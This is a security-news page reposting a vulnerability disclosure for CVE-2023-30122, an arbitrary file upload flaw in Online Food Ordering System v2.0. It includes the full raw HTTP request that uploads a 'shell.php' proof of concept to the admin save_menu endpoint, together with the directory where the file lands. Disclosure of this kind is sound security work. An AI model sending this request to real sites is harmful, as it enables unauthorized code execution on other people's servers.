Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-30122: bug_report/RCE-1.md at main · xtxxueyan/bug_report

An arbitrary file upload vulnerability in the component /admin/ajax.php?action=save_menu of Online Food Ordering System v2.0 allows attackers to execute arbitrary code via uploading a crafted PHP file.

CVE
#sql#vulnerability#windows#php#auth#firefox

Permalink

Cannot retrieve contributors at this time

Online Food Ordering System v2.0 by oretnom23 has arbitrary code execution (RCE)

BUG_Author: xtxxueyan

vendors: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability url: ip/fos/admin/ajax.php?action=save_menu

Loophole location: Judging Management System’s “/fos/admin/ajax.php?action=save_menu” file exists arbitrary file upload (RCE)

Request package for file upload:

POST /fos/admin/ajax.php?action=save_menu HTTP/1.1 Host: 192.168.1.88 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 X-Requested-With: XMLHttpRequest Referer: http://192.168.1.88/fos/admin/index.php?page=menu Content-Length: 808 Content-Type: multipart/form-data; boundary=---------------------------11146509511477 Cookie: PHPSESSID=iuka6rklteufkt7v952vs2g4eq Connection: close -----------------------------11146509511477 Content-Disposition: form-data; name="id" -----------------------------11146509511477 Content-Disposition: form-data; name="name" 11 -----------------------------11146509511477 Content-Disposition: form-data; name="description" 1 -----------------------------11146509511477 Content-Disposition: form-data; name="status" on -----------------------------11146509511477 Content-Disposition: form-data; name="category_id" 1 -----------------------------11146509511477 Content-Disposition: form-data; name="price" 111 -----------------------------11146509511477 Content-Disposition: form-data; name="img"; filename="shell.php" Content-Type: application/octet-stream <?php phpinfo();?> -----------------------------11146509511477–

The files will be uploaded to this directory \fos\assets\img

We visited the directory of the file in the browser and found that the code had been executed

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907